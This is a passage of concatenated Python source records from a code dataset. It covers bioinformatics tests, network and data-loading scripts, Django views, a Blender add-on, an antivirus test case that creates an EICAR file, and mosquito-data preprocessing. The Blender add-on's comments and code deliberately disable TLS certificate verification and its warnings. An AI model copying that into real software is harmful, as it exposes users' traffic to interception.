qualifier=[\"NOT\"])\n try:\n res = self.Annotation(tax='9606', frmt='tsv', \n col=\"ref,evidence,proteinID,goID,proteinTaxon,qualifier\",ref=\"PMID:*\", \n qualifier=1)\n assert False\n except:assert True\n\n def test_annotation_qualifier2(self):\n res = set([ x for x in 
self.Annotation(tax='9606', frmt='tsv', col=\"qualifier\",ref=\"PMID:*\").split()])\n assert 'NOT' in res\n\n def test_annotation_termUse(self):\n try:\n res = self.Annotation(tax='9606', frmt='tsv',\n col=\"qualifier\",ref=\"PMID:*\", termUse=\"slimdummy\")\n assert False\n except:\n assert True\n\n def test_Term(self):\n self.Term(\"GO:0003824\", frmt=\"obo\")\n self.Term(\"GO:0003824\", frmt=\"mini\")\n self.Term(\"GO:0003824\")\n try:\n self.Term(\"GO:0003824\", frmt=\"dummy\")\n assert False\n except:\n assert True\n\n try:\n self.Term(\"G:0003824\")\n assert False\n except:\n assert True\n\n\n def test_annotations_from_goid(self):\n self.Annotation_from_goid(\"GO:0003824\")\n\n def test_annotations_from_protein(self):\n self.Annotation_from_protein(\"P43403\")\n","sub_path":"test/test_go.py","file_name":"test_go.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435392301","text":"'''\nSimulates a token bucket traffic shaper w/ no queue (i.e. packets\nare dropped if no token is available).\nNote: In this version of the algorithm, each token = 1 packet.\n\nClick the \"run\" button up top to run the simulation.\n\nInput parameters (see INPUT PARAMS below):\n - Number of packets received by the shaper\n - Long term average arrival rate of packets (per second)\n - Token generation rate of the token bucket algorithm (per second)\n - Bucket size of token bucket algorithm\n\nOutput:\n - Simply prints the number of packets dropped by the system\n\nAuthor: Thomas Lin (t.lin@mail.utoronto.ca) 2018\n'''\n# INPUT PARAMS\nnumPackets = 10000 # Integer number\narrRate = 350 # Packet arrival rate\ntokenRate = 350 # Token generation rate\nbucketSize = 2 # Max tokens in bucket\n# END INPUT PARAMS\n\n# Library imports\nfrom random import expovariate\n\nprint(\"Simulating %s packets arriving at avg. 
rate %s\" % (numPackets, arrRate))\nprint(\"Token generation rate of %s and max bucket size of %s\" % (tokenRate, bucketSize))\n\ninterArrivals = [expovariate(arrRate) for i in range(numPackets)]\n\nnumTokens = 0\ndropCount = 0\n\nfor i in range(numPackets):\n    numTokens = min(numTokens + tokenRate * interArrivals[i], bucketSize)\n\n    if numTokens >= 1:\n        # A token is available: transmit the packet\n        numTokens -= 1\n    else:\n        # No token available: drop the packet\n        dropCount += 1\n\nprint()\nprint(\"Number of packets dropped: %s\" % dropCount)\n\n\n","sub_path":"queueing/Token-Bucket-No-Queue/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"645463427","text":"from gzip import GzipFile\nfrom zipfile import ZipFile\nimport pandas as pd\nfrom pandas_gbq.gbq import TableCreationError\nimport re\n\n\ndef main(**kwargs):\n    loaded_file_ids = set()\n    zipfile_path = '/home/mjumbewu/Code/musa/musa-509/data/SafeGraph Data Purchase Nov-02-2021.zip'\n    load_patterns_file(zipfile_path, loaded_file_ids)\n\n\ndef load_patterns_file(zipfile_path, loaded_file_ids):\n    dataset_name = 'safegraph'\n    # the named group is read back below as file_id_match['file_id']\n    file_id_pattern = re.compile(r'PA-CORE_POI-PATTERNS-(?P<file_id>\\d{4}_\\d{2}).*')\n\n    with ZipFile(open(zipfile_path, mode='rb')) as safegraph_multi_zipfile:\n        zipfiles = [n for n in safegraph_multi_zipfile.namelist() if n.endswith('.zip')]\n        for zf in zipfiles:\n            file_id_match = file_id_pattern.match(zf)\n            assert file_id_match is not None, f'Could not find file id in {zf!r}'\n\n            file_id = file_id_match['file_id']\n            if file_id not in loaded_file_ids:\n                loaded_file_ids.add(file_id)\n            else:\n                print(f'Skipping zipped file {zf} with id {file_id}')\n                continue\n\n            print(f'Opening zipped file {zf} with id {file_id}')\n            with ZipFile(safegraph_multi_zipfile.open(zf)) as safegraph_zipfile:\n\n                print('Opening gzipped file with name core_poi-patterns.csv.gz')\n                with GzipFile(fileobj=safegraph_zipfile.open('core_poi-patterns.csv.gz')) as patterns_csv_file:\n\n                    print('Reading the ungzipped csv file')\n                    safegraph_patterns_df = pd.read_csv(patterns_csv_file)\n\n                    print(f'Writing the file to bigquery as safegraph_patterns_{file_id}')\n                    
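# Added note: pandas-gbq raises TableCreationError when if_exists='fail' and the\n                    # target table already exists, which is what the except clause below\n                    # relies on to make re-runs of this loader idempotent.\n                    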
try:\n                        # Since these tables are so large, and because past data\n                        # shouldn't change, I'm going to not load data that's\n                        # already present in the dataset. To re-trigger a load,\n                        # I'll have to delete the existing table.\n                        safegraph_patterns_df.to_gbq(f'{dataset_name}.safegraph_patterns_{file_id}', if_exists='fail')\n                    except TableCreationError:\n                        print('Table seems to already exist. Skipping.')\n                        continue\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"airflow/dags/data_pipeline/load_safegraph_patterns.py","file_name":"load_safegraph_patterns.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"555672423","text":"from django.shortcuts import render\nimport uuid\n\nfrom .forms import PostCreateForm\nfrom object.models import *\nfrom object.numbers import *\n\n\n# Create your views here.\n\ndef user_profile(request, user_username):\n    if request.method == \"GET\":\n        return render(request, 'baseapp/user_profile.html')\n\ndef create_new(request):\n    if request.method == \"POST\":\n        form = PostCreateForm(request.POST)\n        if form.is_valid():\n            has_title = False\n            has_description = False\n            has_another_profile = False\n\n            if form.cleaned_data['whose'] == 'other':\n                has_another_profile = True\n            if form.cleaned_data['title'] == 'on':\n                has_title = True\n            if form.cleaned_data['description'] == 'on':\n                has_description = True\n            post = Post.objects.create(user=request.user,\n                                       has_title=has_title,\n                                       has_description=has_description,\n                                       has_another_profile=has_another_profile,\n                                       uuid=uuid.uuid4().hex)\n            if has_title:\n                PostTitle.objects.create(post=post, title=form.cleaned_data['title_content'])\n            if has_description:\n                PostDescription.objects.create(post=post, description=form.cleaned_data['description_content'])\n            if has_another_profile:\n                PostProfile.objects.create(post=post, name=form.cleaned_data['name'])\n            post_chat = PostChat.objects.create(post=post, before=None, kind=POSTCHAT_START)\n            # It would be good to enforce the Post unique constraint here, but I don't want to do that right now.\n            return render(request, 'baseapp/create_new_second.html', {'form': form, 'post': post})\n    if request.method == \"GET\":\n        form = PostCreateForm\n        return render(request, 'baseapp/create_new_first.html', {'form': form})\n\ndef post(request, user_username, uuid):\n    if request.method == \"GET\":\n\n        return render(request, 'baseapp/post.html', )","sub_path":"baseapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"222013988","text":"##\n## Python Programming\n## ===========================================================================\n##\n## Column 3 of the file `data.csv` contains a date in `YYYY-MM-DD` format.\n## 
Print the number of records per month, separated\n## by commas, as shown below.\n##\n## Answer:\n## 01,3\n## 02,4\n## 03,2\n## 04,4\n## 05,3\n## 06,3\n## 07,5\n## 08,6\n## 09,3\n## 10,2\n## 11,2\n## 12,3\n##\n## >>> Write your code from this point on <<<\n\nfile = open('data.csv', 'r').readlines()\nfile = [row[0:-1] for row in file]\nfile = [row.split('\\t') for row in file]\ndata = file\n\nresult = {}\n\nfor element in data:\n\tresult[(element[2].split('-')[1])] = 0\n\nfor element in data:\n\tresult[(element[2].split('-')[1])] = result[(element[2].split('-')[1])] + 1\n\nfor key in sorted(result.keys()):\n    print(key + ',' + str(result[key]))\n\n","sub_path":"03-python=1/q04=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"41752428","text":"# MIT License\n\n# Copyright (c) 2017 GiveMeAllYourCats\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the 'Software'), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n# Code author: GiveMeAllYourCats\n# Repo: https://github.com/michaeldegroot/cats-blender-plugin\n# Edits by: GiveMeAllYourCats, Hotox\n\nbl_info = {\n    'name': 'Cats Blender Plugin',\n    'category': '3D View',\n    'author': 'GiveMeAllYourCats',\n    'location': 'View 3D > Tool Shelf > CATS',\n    'description': 'A tool designed to shorten steps needed to import and optimize models into VRChat',\n    'version': (0, 12, 1),  # Has to be (x, x, x) not [x, x, x]!! 
# Only change this version and the dev branch var right before publishing the new update!\n 'blender': (2, 80, 0),\n 'wiki_url': 'https://github.com/michaeldegroot/cats-blender-plugin',\n 'tracker_url': 'https://github.com/michaeldegroot/cats-blender-plugin/issues',\n 'warning': '',\n}\n\nimport os\nimport sys\n\n# Append files to sys path\nfile_dir = os.path.dirname(__file__)\nif file_dir not in sys.path:\n sys.path.append(file_dir)\n\nimport copy\nimport globs\nimport requests\nimport extend_types\n\n# Load package name, important for updater\nglobs.package = __package__\n\n# Check if cats is reloading or started fresh\nif \"bpy\" not in locals():\n import bpy\n globs.is_reloading = False\nelse:\n globs.is_reloading = True\n\nif not globs.is_reloading:\n import mmd_tools_local\n import addon_updater_ops\n\n # This order is important\n import tools\n import ui\nelse:\n import importlib\n importlib.reload(mmd_tools_local)\n importlib.reload(addon_updater_ops)\n importlib.reload(tools)\n importlib.reload(ui)\n\n\n# How to update mmd_tools:\n# Paste mmd_tools folder into project\n# Delete mmd_tools_local folder\n# Refactor folder name \"mmd_tools\" to \"mmd_tools_local\"\n# Search for \"show_backface_culling\" and set it to False in view.py\n# Done\n\n# How to update googletrans:\n# in the gtoken.py on line 57 update this line to include \"verify=False\":\n# r = self.session.get(self.host, verify=False)\n# In client.py on line 42 remove the Hyper part, it's not faster at all!\n# Just comment it out.\n# Also see pull request for TKK change\n# Also wm progress in client.py\n# Done\n\n# How to set up PyCharm with Blender:\n# https://b3d.interplanety.org/en/using-external-ide-pycharm-for-writing-blender-scripts/\n\nglobs.dev_branch = False\nglobs.version = copy.deepcopy(bl_info.get('version'))\n\n\ndef register():\n print(\"\\n### Loading CATS...\")\n\n # Load settings\n tools.settings.load_settings()\n\n # if not tools.settings.use_custom_mmd_tools():\n # bpy.utils.unregister_module(\"mmd_tools\")\n\n # Load mmd_tools\n try:\n mmd_tools_local.register()\n except AttributeError:\n print('Could not register local mmd_tools')\n pass\n\n # Register updater\n try:\n addon_updater_ops.register(bl_info)\n except ValueError as e:\n print('\\n!!! 
Error while registering Updater:\\n' + str(e) + '\\n')\n pass\n\n # Register all classes\n count = 0\n tools.register.order_classes()\n for cls in tools.register.__bl_ordered_classes:\n # print(cls)\n bpy.utils.register_class(cls)\n count += 1\n print('Registered', count, 'CATS classes.')\n\n # Register Scene types\n extend_types.register()\n\n # Set cats version string\n tools.common.set_cats_verion_string()\n\n # Load supporter and settings icons and buttons\n tools.supporter.load_other_icons()\n tools.supporter.load_supporters()\n tools.supporter.register_dynamic_buttons()\n\n # Load the dictionaries and check if they are found\n globs.dict_found = tools.translate.load_translations()\n\n # Set preferred Blender options\n bpy.context.user_preferences.system.use_international_fonts = True\n bpy.context.user_preferences.filepaths.use_file_compression = True\n\n # Add shapekey button to shapekey menu\n bpy.types.MESH_MT_shape_key_specials.append(tools.shapekey.addToShapekeyMenu)\n\n # Disable request warning when using google translate\n requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\n # Apply the settings after a short time, because you can't change checkboxes during register process\n tools.settings.start_apply_settings_timer()\n\n print(\"### Loaded CATS successfully!\")\n\n\ndef unregister():\n print(\"### Unloading CATS...\")\n # # Unload mmd_tools\n try:\n mmd_tools_local.unregister()\n except AttributeError:\n print('Could not unregister local mmd_tools')\n pass\n\n # Unload all classes in reverse order\n count = 0\n for cls in reversed(tools.register.__bl_ordered_classes):\n bpy.utils.unregister_class(cls)\n count += 1\n print('Unregistered', count, 'CATS classes.')\n\n # Unload the updater\n addon_updater_ops.unregister()\n\n # Unregister all dynamic buttons and icons\n tools.supporter.unregister_dynamic_buttons()\n tools.supporter.unload_icons()\n\n # Remove shapekey button from shapekey menu\n bpy.types.MESH_MT_shape_key_specials.remove(tools.shapekey.addToShapekeyMenu)\n\n print(\"### Unloaded CATS successfully!\")\n\n\nif __name__ == '__main__':\n register()\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359794911","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import StringProperty\nfrom kivy.logger import Logger\n\n\nclass MoneyInput(BoxLayout): # \n\tvalue = StringProperty(\"0.00 €\") \t#formated number string\n\traw_value = \"\" \t\t\t\t\t\t#number string\n\t\n\t#add a number to the raw string\n\tdef addNumber(self, number):\n\t\tvorKomma = self.raw_value[:-2]\n\t\t\n\t\tif (number == '0') and (len(self.raw_value) == 0):\n\t\t\treturn \n\t\ttry:\n\t\t\ttest = int(number)\n\t\t\tself.raw_value = self.raw_value + number\n\t\t\tself.updateValue()\n\t\texcept:\t\t\t\n\t\t\tLogger.warning(\"Input: only numbers from 0-9 are allowed\")\n\t\n\t#delete the last number enterd in raw string\n\tdef delNumber(self):\n\t\tself.raw_value = self.raw_value[:-1]\n\t\tself.updateValue()\n\n\t#update the formated string \n\tdef updateValue(self):\n\t\tvorKomma = self.raw_value[:-2]\n\t\tif vorKomma == '':\n\t\t\tvorKomma = '0'\n\t\tnachKomma = self.raw_value[-2:]\n\t\tif len(nachKomma) == 0:\n\t\t\tnachKomma = \"00\"\n\t\tif len(nachKomma) == 1:\n\t\t\tnachKomma = '0' + nachKomma\n\t\tself.value = vorKomma + '.' 
+ nachKomma + \" €\" \n","sub_path":"src/input_manager.py","file_name":"input_manager.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"536672154","text":"\"\"\"\nRacket - module for working with a racket\n\"\"\"\nimport pygame\nimport colors\n\nsize = (50, 100) # 50x100 pixels\nposition = (0, 0) # position of the racket\nvelocity = 0\n\n\ndef setup(screen):\n \"Setups the initial position of the racket\"\n global position\n\n (_, height) = screen.get_size()\n (racket_x, _) = position\n\n # calculate new y position for the racket\n new_y = height / 2 - size[1]\n\n position = (racket_x, new_y)\n\n\ndef draw(screen):\n \"Draws racket on the screen\"\n global position\n global size\n\n (left, top) = position\n (width, height) = size\n rect = pygame.Rect(left, top, width, height)\n\n pygame.draw.rect(screen, colors.WHITE, rect)\n\n\ndef on(event):\n \"Update racket on event\"\n global velocity\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_DOWN:\n velocity = 5\n elif event.key == pygame.K_UP:\n velocity = -5\n elif event.type == pygame.KEYUP:\n velocity = 0\n\n\ndef update(width, height):\n \"update the position of the racket\"\n global velocity\n global position\n global size\n\n (x, y) = position\n (_, racket_height) = size\n\n new_y = y + velocity\n\n if new_y < 0:\n new_y = 0\n elif new_y + racket_height > height:\n new_y = height - racket_height\n\n position = (x, new_y)\n","sub_path":"day4/pong/racket.py","file_name":"racket.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"228046098","text":"class Solution:\n def longestMountain(self, A: List[int]) -> int:\n result = base = 0\n while base < len(A):\n end = base\n if end + 1 < len(A) and A[end] < A[end + 1]:\n while end + 1 < len(A) and A[end] < A[end + 1]:\n end += 1\n if end + 1 < len(A) and A[end] > A[end + 1]:\n while end + 1 < len(A) and A[end] > A[end + 1]:\n end += 1\n result = max(result, end - base + 1)\n base = max(end, base + 1)\n return result","sub_path":"LeetCode/November Leetcoding Challenge/Longest Mountain in Array.py","file_name":"Longest Mountain in Array.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549619631","text":"import cv2\n\nface_cascade = cv2.CascadeClassifier('./classifiers/haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('./classifiers/haarcascade_eye.xml')\ncam = cv2.VideoCapture('tcp://192.168.1.1:5555')\n# cam = cv2.VideoCapture(0)\nrunning = True\nwhile running:\n # get current frame of video\n running, img = cam.read()\n if running:\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n eyes = eye_cascade.detectMultiScale(roi_gray)\n for (ex,ey,ew,eh) in eyes:\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n cv2.imshow('frame', img)\n if cv2.waitKey(1) & 0xFF == 27:\n running = False\n else:\n # error reading frame\n print ('error reading video feed')\n\n\n\ncam.release()\ncv2.destroyAllWindows()\n\n\n\ndef detectObject(frame):\n\n\n\n 
pass\n","sub_path":"cv-server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"62125945","text":"#!/usr/bin/env python\n# Copyright (C) 2010 McAfee, Inc. All rights reserved.\n# TestcaseID: 1903\n# TestcaseDescription:Primary clean and secondary delete actions for OAS on an eicar file.\n\nimport sys\nimport logging\nimport time\nimport subprocess\n# Add common folder into the sys path for module importing\nsys.path.append(\"../../Common\")\nimport commonFns\nsys.path.append(\"../\")\nimport commonAntiMalwareFns\nimport commonOASFns\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\n\ntestcaseName = sys.argv[0][:-3]\nclass TestCase(BaseTest):\n\n def __init__(self):\n logging.info(\"TestcaseID : 1903\")\n logging.info(\" Primary clean and secondary delete actions for OAS on an eicar file.\")\n self._filename = '/tmp/lsh-1903-eicar-test.txt'\n if len(sys.argv) > 2 and sys.argv[2] :\n self._filename = sys.argv[2] + '/lsh-1903-eicar-test.txt'\n\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n\n # Call the common initialization check\n _retval = BaseTest.init(self)\n if _retval != 0 :\n return _retval\n\n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n\n if not commonOASFns.setOASPrimaryAction('Clean'):\n logging.error(\"Unable to set OAS Primary Action\")\n return 1\n logging.info(\"Successfully set OAS Primary Action.\")\n \n if not commonOASFns.setOASSecondaryAction('Delete') : \n logging.error(\"Unable to set OAS Secondary Action\")\n return 1\n logging.info(\"Successfully set OAS Secondary Action.\")\n \n \n if not commonAntiMalwareFns.createEicarInfection(self._filename) :\n logging.error(\"Unable to create infected file.\")\n return 1\n logging.info(\"Successfully created infected file.\")\n\n return 0\n\n\n def verify(self):\n logging.info(\"Verifying testcase %s\" % testcaseName)\n time.sleep(5)\n if os.path.exists(self._filename):\n logging.error(\"File %s exist which should have got deleted!\" % self._filename)\n return 1\n logging.debug(\"Checking if file is quarantined\")\n if commonAntiMalwareFns.isFileQuarantined(self._filename) :\n logging.error(\"File is quarantined\")\n return 1\n return 0\n\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n # Copy logs and clean them.\n foundCrash = 0\n foundCrash = commonFns.copyLogs()\n foundCrash = foundCrash + self._cleanup()\n commonFns.cleanLogs()\n \n if foundCrash != 0:\n logging.error(\"copylogs returned failure status. 
Maybe a product crash\")\n \n return foundCrash\n \n def _cleanup(self) :\n _retval = 0\n if not commonAntiMalwareFns.resetToDefaults() :\n logging.error(\"Failed to reset to defaults\")\n _retval = 1\n if os.path.exists(self._filename) :\n os.remove(self._filename)\n return _retval\n\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds...\n if(retVal == 0):\n retVal = testObj.execute()\n\n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal = retVal + testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n\n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n","sub_path":"McAfee/src/VSEL - TestAutomation/Testcases/Antimalware/OAS/OAS_BVT_2.py","file_name":"OAS_BVT_2.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"25338306","text":"import pyglet\nfrom pyglet import clock\n\nfrom ScreenManager import ScreenManager\nfrom StateManager import StateManager\nfrom SpriteManager import SpriteManager\n\nfrom Game import Game\n\n\nclass GameController(pyglet.window.Window):\n\t\"\"\"docstring for GameController\"\"\"\n\tdef __init__(self):\n\t\t# create main game window\n\t\tsuper(GameController, self).__init__(1280, 720, \"Panda Runner\")\n\n\t\t# setup various managers\n\t\tself.screenManager = ScreenManager(self)\n\t\tself.stateManager = StateManager(self)\n\t\tself.spriteManager = SpriteManager()\n\n\t\t# load spritesheet and probably sounds in the future\n\t\tself.loadResources()\n\t\tself.start()\n\n\tdef start(self):\n\t\t# schedule update function to be called every frame\n\t\t# I need to add some sort of FPS setting here\n\t\tclock.schedule(self.update)\n\n\t\t# instantiate the main game instance\n\t\t# this will be changed to the menu instance when it's implemented\n\t\tgameState = Game(self)\n\t\tself.stateManager.addState('game', gameState)\n\t\tself.stateManager.setState('game')\n\n\t# prepare various resources such as sprite sheets and sounds\n\tdef loadResources(self):\n\t\tself.spriteManager.newSheet('main', 'sprites.png')\n\n\t# Main update function\n\tdef update(self, dt):\n\t\tself.screenManager.update(dt)\n\t\tself.draw()\n\n\t#main draw function\n\tdef draw(self):\n\t\tself.screenManager.draw()","sub_path":"GameController.py","file_name":"GameController.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"504699635","text":"import sys\nimport traceback \nclass addition():\n def __init__(self, new_x, new_y):\n self.x = new_x\n self.y = new_y \n pass\n\n def __add__(self,add):\n if not isinstance(add, addition) :\n traceback.print_stack()\n sys.exit(\"Error: is not an addition class. Addition Impossible \")\n return addition(self.x + add.x,\n self.y + add.y )\n #def __mul__(self):\n #def __sub__(self):\n #def __mul__(self):\n #def __floordiv__(self):\n #def __truediv__(self):\n\n def __str__(self):\n return \"({}, {})\".format(self.x, self.y)\n\nif __name__ == \"__main__\" :\n a = addition(2,2)\n b = addition(4,4)\n print(a)\n print(b)\n a += b\n print(a)\n a += 1 # Error\n","sub_path":"Langage/Python/Class/addition.py","file_name":"addition.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"522190199","text":"import shapefile\nfrom scipy.spatial import cKDTree\nimport numpy as np\nimport pandas as pd\nfrom os import listdir\nfrom os.path import isfile, join\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.linear_model import LinearRegression\n\n############\n# Preprocessing pipeline. In lieu of SKLearn pipeline, as a result of needing\n# to do aggregation by rows. However, it is modeled on a pipeline such that\n# both the train and test data are passed in once and processed data is returned\n############\n\n#####\n# first step only impacts the training data. It aggregates observations that have\n# the same species/date/trapLocation.\n# The aggregation is of number of mosquitos and if westNile was observed\n#####\n\ndef agg_on_species(train, test):\n\n #Aggregate only mosquitos and westNile\n noAgg = [c for c in train.columns if c not in ['NumMosquitos','WnvPresent']]\n agg = train.groupby(noAgg)['NumMosquitos', 'WnvPresent'].sum()\n\n # Bring features back out from multi-index\n for i, c in enumerate(noAgg):\n agg[c] = agg.index.map(lambda x:x[i])\n agg.index = range(0,len(agg))\n\n # Change WNV back to binary\n agg['WnvPresent'] = (agg['WnvPresent'].map(lambda x:x>0)).astype(int)\n\n return agg, test\n\n#####\n# Initial preprocessing adds a location feature which will be used for merging,\n# changes the date column from a string to a datetime object,\n# drops address columns which will not be used\n# Creates dummy variables for each observed species.\n#####\n\ndef InitPrepross(train, test):\n\n # Adding a location tuple\n def location_add(df):\n df['Location'] = [(df.loc[idx,'Longitude'], df.loc[idx, 'Latitude'])\n for idx in df.index]\n return df\n\n # Changing data type of date\n def change_date(df):\n df['Date'] = pd.to_datetime(df['Date'])\n\n return df\n\n # Dropping address features\n def drop_unused(df):\n for col in ['Address','Block','Street',\n 'AddressNumberAndStreet', 'AddressAccuracy',\n ]:\n try:\n df = df.drop(col, axis = 'columns')\n except:\n print(col, 'not present')\n\n return df\n\n # Adding Species Dummy Vars\n def species_dummies(df):\n species = ['CULEX PIPIENS', 'CULEX PIPIENS/RESTUANS',\n 'CULEX RESTUANS', 'CULEX SALINARIUS',\n 'CULEX TERRITANS', 'CULEX TARSALIS',\n 'CULEX ERRATICUS']\n for s in species:\n df[s] = (df['Species'] == s).astype(int)\n\n return df\n\n # Wrapper function which combines all steps\n def transform(df):\n df = drop_unused(df)\n df = location_add(df)\n df = change_date(df)\n df = species_dummies(df)\n return df\n\n return transform(train), transform(test)\n\n#####\n# Location processing finds each unique location, and then\n# calculates the distance from that location to each park and water\n# feature in Chicago\n#####\n\ndef LocationProcess(train, test):\n parkDir = './AddData/Parks/'\n waterDir = 
'./AddData/Water/'\n\n # Taking in the water shape files, and building a cKDTree\n # which returns the the nearest point to an entered point,\n # and gives the distance\n def buildWaterFinder():\n water = [f for f in listdir(waterDir)\n if isfile(join(waterDir,f))\n if f.count('.csv') ==0]\n\n waterShape = waterDir + water[0].split('.')[0]\n waterSR = shapefile.Reader(waterShape).shapeRecords()\n\n waterFinder = {}\n for i, s in enumerate(waterSR):\n waterFinder[i] = cKDTree(s.shape.points)\n\n return waterFinder\n\n # Taking in park shape files, building cKDTree\n # Also builds dictionaries for the size of each park\n def buildParkDicts():\n parks = [f for f in listdir(parkDir)\n if isfile(join(parkDir,f))\n if f.count('.csv') ==0]\n parkShape = parkDir + parks[0].split('.')[0]\n parkSR = shapefile.Reader(parkShape).shapeRecords()\n\n parkFinder = {}\n parkSize = {}\n for s in parkSR:\n parkSize[s.record[4]] = s.record[19]\n parkFinder[s.record[4]] = cKDTree(s.shape.points)\n\n return parkFinder, parkSize\n\n # Given a location, and one of the finder dictinaries,\n # return distance to nearest location in finder\n # and if size dictionary is present, add in size location\n # Also returns an inverse square-law feature of:\n # park size / distance to park ^2\n def calculate_distances(loc, finder, size = None):\n Dist = {}\n for k in finder:\n Dist[k] = finder[k].query(loc, 1)[0]\n\n if size:\n toRet = {}\n for k in Dist:\n Dist[k] = (Dist[k], size[k], size[k]/(Dist[k]**2))\n return Dist\n\n # From the dictionary returned by distance finder, create useable DataFrame\n # mostly deals with re-indexeing, and re-naming\n def dfFromDict(dct):\n toRet = pd.DataFrame(dct)\n toRet = toRet.transpose()\n toRet.index = [idx for idx in toRet.index]\n\n if type(toRet.iloc[0,0]) == tuple:\n for c in toRet:\n toRet['P ' + str(c) + ' A'] = [e[1] for e in toRet[c]]\n toRet['P ' + str(c) + ' E'] = [e[2] for e in toRet[c]]\n toRet['P ' + str(c)] = [e[0] for e in toRet[c]]\n toRet = toRet.drop(c, axis = 'columns')\n else:\n toRet.columns = ['W ' + str(c) for c in toRet.columns]\n\n return toRet\n\n # wrapper function which searches through unique Locations\n # and finds distances to features\n def info(df, finder, size = None):\n uniqueLocs = df['Location'].unique()\n rows = {}\n for loc in uniqueLocs:\n rows[loc] = calculate_distances(loc, finder, size)\n\n return dfFromDict(rows)\n\n # creates dataframe that will be passed into svd\n def transform(df):\n toRet = pd.concat( [info(df, waterFinder),\n info(df, parkFinder, parkSize)],\n axis = 'columns')\n\n return toRet\n\n parkFinder, parkSize = buildParkDicts()\n waterFinder = buildWaterFinder()\n\n # Returns DFs: index = locations\n return transform(train), transform(test)\n\n#####\n# SVD for park/ Water data\n# gets trained on \"train data\"\n# but fits both training and testing data\n#####\n\ndef SVD(train, test):\n\n # Find columns that are marked with a certain letter\n def find_cols(df, tpe):\n mask = [c for c in df.columns if c[0] == tpe ]\n\n return df.loc[:,mask]\n\n # Provide a fitted Truncated SVD\n def yeildFitTSVD(df):\n comps = 4\n\n TSVD = TruncatedSVD(n_components = comps)\n TSVD.fit(df)\n\n return TSVD\n\n # Transform, given an SVD\n def transformTSVD(df, TSVD,tpe):\n toRet = TSVD.transform(df)\n toRet = 